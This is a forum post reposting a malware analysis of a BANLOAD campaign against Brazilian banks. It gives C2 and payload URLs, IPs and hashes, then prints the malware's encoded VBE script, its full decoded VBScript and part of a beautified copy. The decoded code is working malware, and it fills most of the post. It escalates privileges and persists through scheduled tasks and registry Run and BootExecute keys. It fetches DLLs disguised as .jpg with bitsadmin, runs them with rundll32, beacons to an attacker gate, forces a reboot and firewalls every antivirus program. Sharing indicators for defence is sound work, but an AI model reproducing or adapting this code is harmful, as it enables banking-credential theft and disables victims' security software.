Malware campaign against Brazilian banks

Started by D3ivid, August 13, 2015, 06:20:04 AM


Hi, here is the code, courtesy of malwaremustdie, of a piece of malware aimed at Brazilian banks. The post is long, but I prefer to paste it here along with the link, since they may block it. I hope you find it interesting.

Code: vb

# Brazil-based BANLOAD malware campaign is shifting to the AMAZON VPS in AS16509 on:
# martinstranns.com.br // gates (cnt.php)
# brcentermodelo.com.br // payload, updates, parts
# AWS IP: 52.8.140.254 and 52.8.51.135
# Malware MUST Die!!

// Sample:

SHA256:         8538c78539832eaf25550bdf0ab1a9f9f004459af0208cf4d047aa41dfb6f260
File name:      ValeViagem.vbe

A VBA Encoded and Obfuscated Script to Download and Send Sensitive Information to
South America Banking malware

// Gates:
http://martinstranns.com.br/contador/cnt.php

$ ipchk geo martinstranns.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.140.254
-----------------------------------------------------------
{
  "ip": "52.8.140.254",
  "hostname": "ec2-52-8-140-254.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}

// payload
http://brcentermodelo.com.br/arquivos/up.jpg

// updates & parts:
http://brcentermodelo.com.br/arquivos/host.jpg
http://brcentermodelo.com.br/arquivos/part.jpg

$ filemd5 *
up.jpg:   PE32 (DLL) (GUI) Intel 80386 MS Windows 45568   692eedb2b519b86f9d5a1e4a85b7b606
host.jpg: PE32 (DLL) (GUI) Intel 80386 MS Windows 1483776 8fdaa336d4699a02f1d349c4d7984993
part.jpg: PE32 (native)    Intel 80386 MS Windows 40208   d5915a4c454e50d76b343019d9978373


$ ipchk geo brcentermodelo.com.br
-----------------------------------------------------------
Source : geo
IP     : 52.8.51.135
-----------------------------------------------------------
{
  "ip": "52.8.51.135",
  "hostname": "ec2-52-8-51-135.us-west-1.compute.amazonaws.com",
  "city": "San Jose",
  "region": "California",
  "country": "US",
  "loc": "37.3394,-121.8950",
  "org": "AS16509 Amazon.com, Inc.",
  "postal": "95103"
}

// ======================
// Microsoft Encoded Script
// ======================

#@~^oh8AAA==vCeMCeCeeCeCMeCeMeCeMMCeeCMB@#@&BCMMeCeCe$X~37W RcMeCeMMCeev@#@&BMeCMCeM
CeCeeCeCMeCeMeCeMMCB@#@&9ksP\5qd%yYl(nk8f9 +@#@&j+DP%z~4!8"sm(vWWdPx,ZM+lD+}8LmO`r
j^MkwD ?4+V^Eb@#@&?Y~\}qk%+Ylp+b4f[y Px~;DnlDn}4%mD`JUMywDkUocsrs?XkO+sr4Nn^Yr#@#
@&KjX]4"cR{%7bpik\AX,'~LH$(!8.:1qvW0d Io]+mNcE_|Stw?}sKq)]2'Hbm.WdG6YwbUNKhd~gK-
/;MDnxD#DdbW   -nMW9;mD1C:Jb@#@&q0,cq ?YMcKjlI4"c0{R\)(`d\qhXS,JGEb,@!@*PZb,W.,`&x?
DDvKjlIn4.c0{R\boi/7hlS~JjkkYCJb~@!@*~!*~WMPc( ?Y.chjXI8.c0F%7b(`/7   hl~~JRJb~@!@*P
ZbP:t+  @#@&d&0,jm.raY bMLEs+UOkRZG;   Y~',T,K4x,@#@&idUnY,I5*+/ULly?a2AlD!ys/6R RN9+
Ptn}K&:~',Z.nmY+68N+^YvEUtn^VcbwaVb^lDkGxr#@#@&idI$Xvkxol"jwaAlDT s/X%+%99+:}Fth&K j
4+sVAam;D+,JhkMywDRn6JS~q?MywDR?1.rwDs!Vs1ChP'Pr~ur~~S,JD;Um/E~,q@#@&7iUmDbwD p!
kO@#@&d3U9Pq6@#@&AxN,(W@#@&na&H,8zhAALa9KAG/;oH8LnPxPNz~4T(ysmq+c6JRA62l       N3U7kDKU:
xYUO.k  ok`E]jeUK3H"6r:]Eb@#@&qW~v\}Fk0yYXo+b4&9 y sbVn2XkdOk`naf1O4Xh$ALavxW$W//TH8o
n~[,Jw5o0sUO WJ*b,K4x@#@&dq?1.kaY p!kO@#@&+x9~k6@#@&knOPd4V 4\p"&PxP7}Fk%+Ol(+r82N
+ c/M+CD+:+6Dsbs+vn2&g,8zhAhN2vxWAK//ot4T|~[~E';p0qsxO WEBP S~DD;+*@#@&S8V 4\(.qc/VK
/n@#@&B  cR)z]p`q.}~]I&)cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,+m4W,]I@*@*~Jr]jeUK2t]r}
K]'Y/rtn`K3IH)t2Y{hCDDRE'rDJ'EMJ'JbErJbB!BKD!+@#@&BcR R=.)]&b.A(?=RRc v@#@&LHA8!8"sm
(vWWScI;UvJmh[,z^PknD6 6PjhSn#b"q)Ad2~ErtYD2)Jz4M^nxD+M:GNnsKR^Ws 4MzC.$Ek-Gkz;wc%
aoErPJHJ*~ZSKMEn@#@&Lz$(!4.hm&vc6J I!xvJ^:[~Jm~/O6c+an,Ew-CMkC4^n,]]z1GrHuPJ\J*~T~:
D;n@#@&Bc Rc)bj(jb")cR Rv@#@&LzA(T4.:^(+c0J "EU`r^sN~Jm,D+TP$;+MX~CnS\wU5?:3H'ZW        O.W
^?YT!qwU+.\b^+k-!ELJ4E'rwE[rjr[E7J,[P|@#@&EPL[dm4YCd0/PJ/IAbKA~&s,zUZ~rH/AP&?:~J,[~
oKD:COGlO+:rs+cGlD+b9NvExr~~ BPHGS`#*Sc*P[,E~z:1,JE     {3wb0fl0OZAT0 cFq %{*+Ry*)2sy%A
A O$8WJEPJK]~rJms[PJmPk^4Ym/0/~z93d2P2,&KgPEEPG2o)RfX% T~!0 c8Fv %FXv  Xb2s+0~2 O$8W
JJ,&oPL/Dl.Y~v,B~JrEJ4YO2=zzhCMYrxkOMlU /cmWsR(.z1WUYmNG.JmxD w4wg!.s']n^ELkUD]]/rtK
j:2]HzH2YD mUOrErJErPJIj,?IjKAHEPLPm@#@&JP-k/1tYmdV/,z;I3bP3,zoPJjZ,rH/APzjP,J~[,oKD
hmYGlYKbh+vfCYb[[vJxrSPy~PgGA`*#BcbP'~rP&Kg~Jr        {3wb%9XROTAZ0 cq8v %Glv +*z&o RA3+O
A8WEJ,zK"~EJ1:9P&m~d1tOlkV/,z93d2K3~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8*JE~
Js~[kOlMY~v,BPEErJ4YD2=z&slMYk  /D.l    xdR1Wh (Dz1GxDlNK.&m    Ycw4w_;MVx$g&bY$Y/}HniPAIHb
t3uTR1x JJrJrEPJIiPU5jPAHJ*S!BKD!n@#@&ERcR )iKGbP2= RcRv@#@&LX$8Z4":1(+cWdR"ExvJ1hN,
z^Pkm4Om/3k~z;I2zP3PJs,zjZ~6g?Pb"PPJf3Jz5PTTZ,l!Z~JKH,Jr        GAsz0fl%R!~!0RWFF+R%F*v +Xb
2sy%$2+1~8EJ,EPLPm@#@&JzP],JEms[,z^,4bY/mNsrx,zODmxdWDPDYIz1f}\YPJfKhUVGC9P&n"(r"qP
e,Cq!u,]indFjb]&b~S2uPuj5UK3H"r6Pu-]!2\mDkm8s+uRD:2J~',{@#@&r~[MEU[^V&+ 6nPujI?PAH"
rr:]'YEa\CDbl8s]RDhwBaFrE~z"j,?e?P3tJb~ZSKMEn@#@&BR  c)]2&H&) cRcB@#@&LH$4Z4":1q*6
SR";xvJms[~z1Pkm4YCd0/~z;]2zK3~JsP&j;P61;3,zj:PrP[,sK.:mY9lD+Prs+`GCYbN9cExr~,F*~~H
Khc#*Sc*P'~|@#@&E~JKHPrEPG3wbRf*ROZ$!RO*F8vR0F*v +*z&sy0$2y,~8fJE~JK]PrEmsN~&1P/^4Dl
d3k~Jf3d2:2PJKg~Jr      {2wb09l%OZ$!ROc8qORGlvR X)2s+%~3 OANfrJP&o,[dt!O9WA    PJDPJY,!,zW
JrP&]`P?IjKAHJ*ST~:D!+@#@&v cR )nJ)cR  E@#@&%z~4T4.h1qW0dRI!xvEmsN~z1Pd^4YlkV/,zZ"3
)KAPJs~zj/,rHZA~zUK~E,[PoGM:CYGCD+Pb:`fmY)N9`Exr~~*BP1KA`*#~Wb~[,{@#@&EP&PgPEJP{2w
b09l%OT$Z%Rc8q+O0F*+O lb2o RA3 OANqrJPJPI,JJ1h[PJm,4rYdC9:rx,&YMlUd6+D~VuI)1G6t]~JfK
hx^Wm[PJn]q}I(PIPC&!C,JJ4OOw=zJ4.mnUD+.:K[+^W ^K:R8.Jl.;!r7WdJtK/YcLaLJrPEJu?ej:2H"6
r:]-u/6Hhj:2]1)\A] Ys2JrJ~',{@#@&E,[dm4Om/VkPJf2d2:3PJKHPrJ`{AsbR9*RO!~T0OWF8vR%{X+O
+*zfsy%$3y,ANqrJ~zw~L+^4W,F!Z&y@*PrJY?I?P3tIr}P]']Ea-CDbl(Vn]EErJ~z"iPU5jPAHJ~',{@#@
&r~L[.oc+6Pz9f,JECnS\wUW0DAlM+-tr^DK/K0O-     r       NGhkwZ!D.n      Y.n.kkGx']!
xErPJ\PuZ}\n`K3I
gb\3uPzD~IAM{Ut~z9PrJ.EU[^Vf ,Y?I?P3tIr6Pu-YZ}\hjPAIgbHA]cO:a~:FrJ~&wJ#BT~:DE@#@&Bc
RcRln)]:) Rc B@#@&%z~4!8"sm(vWWdR]!xvJmsN,&m,Dnoc+an,bfG~JrC|d\w?I?:2\-/;MDnxD/W        Y.G
^?+Ow;WUYMG^-KmDDkymxrEPJ\~CbNn VmKh+t+/kCL+,zDP]2!mG6IG~z9P+~JsJbSZ~PD!n@#@&%HA(!
4.:1(vW0JR"EUcrm:9~z1P/14Olk3kP&Z]3zK3PJoPJ?/~}1Z3~J?PPr~LPoKDslYGlDnKb:n`GlOnzNNvEx
r~P2S~1Khv#b~*b,[~{@#@&J,zPH,JJ`{As)%GXROT~!ROc8F+R%F*Oy*)fw %~3 OA8yEEPJK"PEJ^h9P&
m,8kD/C[skx~&DDCxkWD~a]"b1GrtYPJfGh    VGC9Pzh]q}Iq:e~C&M_PEJ4ODwlzJ8D1+UOD:G[VGR1Gs
R8MzmD;!k7G/JwCDDR%2TJJ,EJu?5UP3H"r}KY-Y/}HKj:3Igb\3u{nC.DRn6ErP'km4Ylk3k~zG2J2:2~&
wPz:HPrJ        F3obRfl%R!$TRO*F8ORGX  *)fw 0AA+OANyJrJJ,z"iPU5jKAHE~LP{@#@&J,[DL +X+,b9
f~ErCFStw?I?P3t-Z;.M+UY;G       Y.KVU+Y'ZKUYMWs-U+ddbWx,\l      lo.EJ,z7P$WGOA6nm!O+,zO~"2Mm\`
SPq|j\P&9PrJl!YK^tmVPmEOG1t3,M-ZP-ZYj5UKAH]r6Pu-YZ}\n`K3]gbH3Y|nCDD 6n'!rJPJsrb~Z~
PD!+@#@&EeeCMeCeeC)HK&.&Ki?MMCeMeCMeE@#@&[ZMDWeR/]hws1 6w!s|G8CKqD_ET9$&iov#@#@&oE      m
YbGUP$C9\\     9VntNxiAz:uz;fAKFkE(fNfvrUovy%s2KF"Sh}]N*@#@&~,PsK.P(*Y8}"LOq(K3m(9R%(68
$M,'~Jx`6Uov+%wf:G"dn\IN*P:GP8PjYw~R8@#@&,~P,PP&W~HbNvrU(+RsfKF"Sh}][BP4XO8p"LO((
K31qG%%&68$MBPq#,'~E'JP:4+      P2XrOPwWM@#@&P~~g+aY@#@&P,P5u9\v-       GMK}9B`A)sCHZf~nndE&f%&
,'~J0Y,cr      (vy0o&:G.SK}][BP8*Dqp.L1((K2^(G%0qXq~M~ P8#@#@&2        [PwEUmDkGU@#@&?!8P&oyysK
lFoyDrj(T\:[FZz`zpo;VM!X{",a,;b@#@&~,P,sWMPACm4PsGW614$4190rOw0^~rx,b5s;M!TlG],X1Zc?
;8wWV[nM/~@#@&~,P~,P,P?Y,]M+*r*0(4\6wF;+F5Fc:BppW*.D0\$0WvuZaL%HtXB8P'~-5Fd%yOl(nb4
2N yRVnYwWsNDcsFc6O4;(1NR61w6VcnCY4b,@#@&P,~P,P~~U+Y~  RLf;0pkxq,',IM+*bX3ot\0aF/+8p
FWP9opcl".%7ARcC/2T%ztlBFcsrs/P@#@&,P~P,~,PWKD,+l1t,2A_th9y%^4h*h!L1WyVMz6LNAlLsv"
-ZvTv"Tv0c0XbVG",kUPq0N&50(kxF,@#@&~P,P~P,P~~,Pk6~S;l/c(xUYM`q~2$_th9y0m4nXA!o1*"^
DzrN%~*%^v.\!+!+]!+3*%+6)sKy~,ER6+rbbP@*P8POtnU,@#@&di7d,P~~,LX$8Z4":1(+cWdR"ExvJ1h
N,z^P   +Od4Pl9-0bD+SCsV,0bDnhCs^PCN9~D!Vn~     l:nxrJEPL~7pqk%yY*o+b8&9 +RV+OobV+gC:`w~u
4:x Rm4nXA!oHc.sDHr%%~*Ls.\TvZ"!0cRv6zVK"#,[~JrJ~[bD'bUPmmYbGU'(VKmVP2.Ko.lsxJrJ~
',wAu4s9+%14h*A!ogcy^DH6LNAXL^v"-Zv!+]!+3cRab^W.P'PEErPnxm8V'znkJ#STBK.E@#@&d7id,
PP,PNzA(!8ysm(W0Sc]E   `J1h[PJm,+^tG~'g_-r~[,w$u4:9+01tK*S;T1*.VMXrNL~XL^v"\ZvT"!v0*
%+6b^G"PLPr@*@*PYjI?P2t]r}KYwuZr\K`K3Ig)t2Y|nmDYr[r JLJ.JLJ.ELJkrb~Z~KM;n@#@&did7P~~
,P%X~8!(yh^&vcWJcI;xvE1:[,z1PxYk4PmN-0bDnAmVV,WkM+hmssPmN9P.Esn,xC:xJrJ~',\pqdR O*
onb4f9 yRMYwrV1C:`2$_t:x+%1tnlA;ogc.V.X6%NAXL^y7!T+I!VW%6zsKyb,[,JJrP9rD{W;Y,
l^ObWx{8VKm3,2.WTDm:xJEE,[~w~uts9+01tnXA!oHc.sMX6NL~*L^v.-!+!IZvV*Rv6zsW.P[,EEJ,+      l
8VnxH+dJ*S!BK.;@#@&77iP~P,~,P3 N,q0@#@&,~P,P~P,1naD@#@&,~P,PP,~(o. ^nCGL+MkiqZt:9FT
z,VG*aOt54g[Rr1a0^P@#@&P,~Pg+aY,@#@&3   NPU;4@#@&s!U^YbW        P[!!.650/"As^m+6w!:F{8CGFMu!!
B$&`s`*@#@&7+FM\S`FHBHx\o*!Z}LGX|,',LzA8T(yhm&c6S 3XwlU[Ax-kMG        :n      YUYDbxTd`r]KI}M]
)tsqd3?v(%+bYJ*@#@&da&qKIE[H:Ky f.      wG(~x,LzA(T(yh1q+c0dRAawmx[2    \r.Kx:UYUYDbUL/vJun
]r!]zHoqd3?uJb@#@&d?nO,fnS1eRC+Hr~\%l,05!       2tbZc[C,'PVnY}4L^O`rhbxhohOk)w-cwDKWOwU+m
;.bYzZUD+.yJ*@#@&i?OPAchExE)F2n;U2vb,66tK3sxR,qpX4PxPGnS150uyXr$-R*13$T      2tz!WNlc2
Xnm5EnDH`EjV+1OPCP0MGhPzJ,[~JUE,[~JDEPLPErrP[~EjJ~[,EbJ~LPrDJ,[,EErP'Pr/E~LPJhEPLPJ
ME~[,JKJ~[~E9J~[,EErP'~rmJ~',JOJ*@#@&doKD,2l1t,[bSH*(O+^y1 1#2Gc*M/nGD36X4;GW|.%!F
*,kU~Ac:;B!bF&h5Uwb,X0}h3sU%OF}*4+@#@&iPPqrY4PNzA\co,m H+1.3fWXD;+{O00X8!W*|M0!|
X@#@&idl! (t7;uWWPx~$CN7\qfMht[9`Az:uX/9~nF/!(fN&c alY4PK?ro  n9n.KN!mYA6b@#@&d7l!
8tq\;_Gc,'P"n2Vmm`CE+8\-;_GcBJYKMWo.CssrVdv60+#uJ~GV\S`FH9Hx-pW!!\%flv|*@#@&dil
! 8}    -$CGc,xP"+2smm+cC! 8}q-$CGW~r]nMWT.lssrV/YEB6&8K5!NH:K"xGDqs{(b@#@&d7/OP"MXb
*3p4t02F;+8pqWKx(pW*..%7A0c+C/2T%X4X98P',-}Fk%yYX(nr(&[ y MYoG^N+.cmE+4\       7;uKc*@#@&
id@#@&di/nY,0%2;3odx8P',]!vlkl3pt\WaF/ 8}FWKBp5c*".R\$%W_Z2T%Ht*xFcok^+d@#@&d7@#@&
ddwGD,2l14~yFXwmu 6skbXH,rx,0%2;3pd    F@#@&i7i}1DsZ,ZX2&p*49L%Zc.s,'P.{XwmCy6s/z*tRHl
hn@#@&7di(0,\}qk% OXo+r42[y  V+D26D+    dkKxHls+ctOYsZ1ZX2qoX49T%Zc.Vb~{PE+XnJ,K4n      @#@&
77id%X~8Z4"sm&vc6Sc]E   `EmsN~&1PxO/4Pl9-EPLPr0EP'~rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~
[,JsP6k.nSlV^~l9NPM;s+,xm:n'EErP'P.{Xwmu+}V/)XtRHlsn,[~rJrPNbD{rx,l^YbWUx(VW1VPaDWT.
C:{JrJ~[~C! 8}q-;_W*~LPJwE,[~yFzwmuyr^/blHcHls+~[,JEE,+xm8V'XdE#B!BK.En@#@&d7di%X~
4T8.:m(W0JR";  `E1:9Pz1P^tKPwgQ-E~LPl!+4\\$uGc,[,JwJ~',y{Xw^Cyrsdz*H Hm:nPL~r@*@*,
]U5?:2t]r}KY-uZ6\hjKA]1zH2umKlMJLJOJ'EcJ'JME[rDE'rkJbSZ~PD!n@#@&7idiLX~4Z8ysm(vW0J "
ExvEmsNPJ^~xYkt~lE~LPENr~[,J-E,[PEWrP'PrrrP',JMJPLPrnJ,[~JSJ~',Jlr~[,JVr~'PrV,0EP'~
rkEPL~JMJ~',J+E~LPEhr~LPEmJ,[PrVr~[,JsPmN[~MEV~xm:+{EEJ,[,y{Xo^_ 6Vk)*tRHCs+P'~rJEP
9rM'G!Y,lmDkKU'(VGm0P2.KoDmh'rJJ,'~l! (}        \5uKc~[,E-rP'~.GXo^_ 6Vk)lH gls+PLPrEJ,+Ul(
VnxH+/rb~Z~KM;n@#@&did3x[~&0@#@&i716O@#@&dd(L. snm{T .bj&!}sN8TX,\}Fk%+Ol(+b8&9  c!
nYwW^NnDcC! 8}q-;_W*b@#@&d~~Ax[PqrDt@#@&dg+6D@#@&~P,PKcUK4;1Z  {k^Y,Gh}cO5Fk{%h~{P9K
UPlk33amInd!VO{U;1mnk/@#@&2    N,oE    mOkKx@#@&TNQIAA==^#~@


// ========================================
// Turn out to be Obfuscated VBA Script
// ========================================


'**************************'
'********By Evo...*********'
'**************************'
Dim vQ1s82t5Xeib3d22
Set jyBb0bzmcI64fL = CreateObject("WScript.Shell")
Set vQ1s82t5Xeib3d22 = CreateObject("Scripting.FileSystemObject")
PU5Rebz4878vAXUsvWw5 = jyBb0bzmcI64fL.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")
If (InStr(PU5Rebz4878vAXUsvWw5, "7") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "Vista") <> 0) or (InStr(PU5Rebz4878vAXUsvWw5, "8") <> 0) Then
        If WScript.Arguments.Count = 0 Then
                Set Rq56sng5zSppB5r02lCx828dDeTZKZP3T = CreateObject("Shell.Application")
                Rq56sng5zSppB5r02lCx828dDeTZKZP3T.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
                WScript.Quit
        End If
End If
Pp3N9byPBwjp6JoBoCCgMbgK = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%SYSTEMROOT%")
If (vQ1s82t5Xeib3d22.FileExists(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f")) Then
        WScript.Quit
end if
set LbG2hvXzI = vQ1s82t5Xeib3d22.CreateTextFile(Pp3N9byPBwjp6JoBoCCgMbgK & "\qXfWln92f", 2, true)
LbG2hvXzI.Close
'....:ARQUIVO RRI:....'
jyBb0bzmcI64fL.Run("cmd /c echo RR>> ""%SYSTEMROOT%\%COMPUTERNAME%_Part."&"r"&"r"&"i"""),0,True
'....:VARIAVEIS:....'
jyBb0bzmcI64fL.Run("cmd /c setx.exe UPLKVARIABLE ""http://brcentermodelo.com.br/arquivos/up.jpg"" /M"),0,True
jyBb0bzmcI64fL.Run("cmd /c setx.exe upvariable %RANDOM% /M"),0,True
'....:AVISAR:....'
jyBb0bzmcI64fL.Run("cmd /c reg query HKLM\SYSTEM\ControlSet001\Services\G"&"b"&"p"&"S"&"v" & _
" &&schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[Plugin][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM" & _
" ||schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 2, Now()),4) & " /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}4"" /F &start ' ' """"http://martinstranns.com.br/contador/cnt.php?url=[N/A][%COMPUTERNAME%]-cn-"""""" /RU SYSTEM"),0,True
'....:UPDATE:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONSTART /DELAY 0009:00 /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}"" " & _
"/TR ""cmd /c bitsadmin /transfer t%RANDOM% /Download /PRIORITY HIGH %UPLKVARIABLE% %SYSTEMROOT%\%upvariable%.tmp" & _
" &rundll32.exe %SYSTEMROOT%\%upvariable%.tmp,#1"" /RU SYSTEM"),0,True
'....:REINI:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 14, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /TR ""cmd /c schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}3"" /F &shutdown /r /t 60 /f"" /RU SYSTEM"),0,True
'....:KL:....'
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 4, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /TR ""cmd /c bitsadmin /transfer k%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/host.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%.tmp""" & _
" &schtasks /DELETE /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}1"" /F &echo 10032> ""%SYSTEMROOT%\%upvariable%"""" /RU SYSTEM" & _
" &&reg.exe ADD ""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v %COMPUTERNAME% /t REG_SZ /d ""rundll32 %SYSTEMROOT%\%COMPUTERNAME%.tmp,#1"" /F"),0,True
'....:PART:....'
jyBb0bzmcI64fL.Run("cmd /c reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Partizan"" /v HideWelcomeMessage /t REG_DWORD /d 2 /F"),0,True
jyBb0bzmcI64fL.Run("cmd /c schtasks /CREATE /F /SC ONCE /ST " & FormatDateTime(DateAdd("n", 3, Now()),4) & _
" /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"" /TR ""cmd /c bitsadmin /transfer p%RANDOM% /Download /PRIORITY HIGH ""http://brcentermodelo.com.br/arquivos/part.jpg"" ""%SYSTEMROOT%\%COMPUTERNAME%_Part.exe"" &schtasks /DELETE /F /TN ""{7EFA8D58-0B08-4116-8756-25A3F28BE29B}2"""" /RU SYSTEM" & _
" &reg.exe ADD ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" /v BootExecute /t REG_MULTI_SZ /d ""autocheck autochk *\0 \0%SYSTEMROOT%\%COMPUTERNAME%_Part.exe\0"" /F"),0,True
'*********ANTIVITUS*********'
d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
Function qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(OnX628F3T7zLPZRd)
   For b5t1Qzj9IbTEcID88Ix1BG = Len(OnX628F3T7zLPZRd) To 1 Step -1
      If Mid(OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG, 1) = "\" Then Exit For
   Next
   qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3 = Left (OnX628F3T7zLPZRd, b5t1Qzj9IbTEcID88Ix1BG - 1)
End Function
Sub Igz2lPa7g2riUI0Zmd10y(AQFuGG057R9x9C)
    For Each l74x9hqbNd8O9pfl in AQFuGG057R9x9C.SubFolders
        Set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(l74x9hqbNd8O9pfl.Path)
        Set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
        for each pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz in W8j3qkXsn1
            if LCase(InStr(1,pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz, ".exe")) > 1 then
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=in action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c echo \??\" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & ">> %SYSTEMROOT%\%COMPUTERNAME%_Part"&"."&"r"&"r"&"i"),0,True
                                     jyBb0bzmcI64fL.Run("cmd /c netsh advfirewall firewall add rule name=""" & vQ1s82t5Xeib3d22.GetFileName(pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz) & """ dir=out action=block program=""" & pBHhmJ28chP5wugN4zlryOjjB5jl6zv0606R06k486xAloz & """ enable=yes"),0,True
                               End If
        Next
        Igz2lPa7g2riUI0Zmd10y l74x9hqbNd8O9pfl
    Next
End Sub
Function d0GrfY8sRwFlc2OF0mK71Ho1rHu0Jq3UF()
        e7GMLU1NJynvX400ZjD56K = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES(X86)%")
        x31PYudMTPznDrWF7X = jyBb0bzmcI64fL.ExpandEnvironmentStrings("%PROGRAMFILES%")
        Set DeLcY8H2yOBv859kq0nEZA04da = GetObject("winmgmts:\\.\root\SecurityCenter2")
        Set E4muJuAK3PqSp6i9xfZPkmn891Q5he = DeLcY8H2yOBv859kq0nEZA04da.ExecQuery("Select * from A" & "n" & "t" & "i" & "V" & "i" & "r" & "u" & "s" & "P" & "r" & "o" & "d" & "u" & "c" & "t")
        For Each dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5 in E4muJuAK3PqSp6i9xfZPkmn891Q5he
          With dAwM4X9ec62N2cVED45rCe7tkfy6buo4Kr8uK5
                au2bZWvqHo4 = qHdv6vWDGPZdJUBAmHyCDBPKsuIDj3(.pathToSignedProductExe)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles(x86)%",e7GMLU1NJynvX400ZjD56K)
                au2bZWvqHo4 = Replace(au2bZWvqHo4,"%ProgramFiles%",x31PYudMTPznDrWF7X)
                set RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1 = vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
               
                set W8j3qkXsn1 = RG65i5kXhMfp1C21Q14TJXQ45zr8vB846HCpg8yh5J1.Files
               
                For Each z7yFcH2OlsA5M in W8j3qkXsn1
                        Z9tF09CxEIX5hJg804rl = z7yFcH2OlsA5M.Name
                        If vQ1s82t5Xeib3d22.GetExtensionName(Z9tF09CxEIX5hJg804rl) = "exe" Then
                                jyBb0bzmcI64fL.Run("cmd /c netsh adv" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l firewall add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=in action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c echo \??\" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & ">> %SYSTEMROOT%\%COMPUTERNAME%_Par"&"t"&"."&"r"&"r"&"i"),0,True
                                jyBb0bzmcI64fL.Run("cmd /c netsh a" & "d" & "v" & "f" & "i" & "r" & "e" & "w" & "a" & "l" & "l f" & "i" & "r" & "e" & "w" & "a" & "l" & "l add rule name=""" & z7yFcH2OlsA5M.Name & """ dir=out action=block program=""" & au2bZWvqHo4 & "\" & z7yFcH2OlsA5M.Name & """ enable=yes"),0,True
                        End If
                Next
                Igz2lPa7g2riUI0Zmd10y vQ1s82t5Xeib3d22.GetFolder(au2bZWvqHo4)
          End With
        Next
    P4ST6hCNCn7ilt9DmQ49Y7i78m = DTSTaskExecResult_Success
End Function


// ======================
// Beautified:
// ======================


'**************************'
'********By Evo...*********'
'**************************'

Dim MyFileSysObject
Set MyMalicious1 = CreateObject("WScript.Shell")
Set MyFileSysObject = CreateObject("Scripting.FileSystemObject")
MyWinVer = MyMalicious1.RegRead("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName")

If (InStr(MyWinVer, "7") <> 0) or (InStr(MyWinVer, "Vista") <> 0) or (InStr(MyWinVer, "8") <> 0)
    Then
        If WScript.Arguments.Count = 0 Then
          Set MyShellScript = CreateObject("Shell.Application")
          MyShellScript.ShellExecute "wscript.exe", WScript.ScriptFullName & " |", , "runas", 1
          WScript.Quit
        End If
End If

MyUserName = MyMalicious1.ExpandEnvironmentStrings("%SYSTEMROOT%")
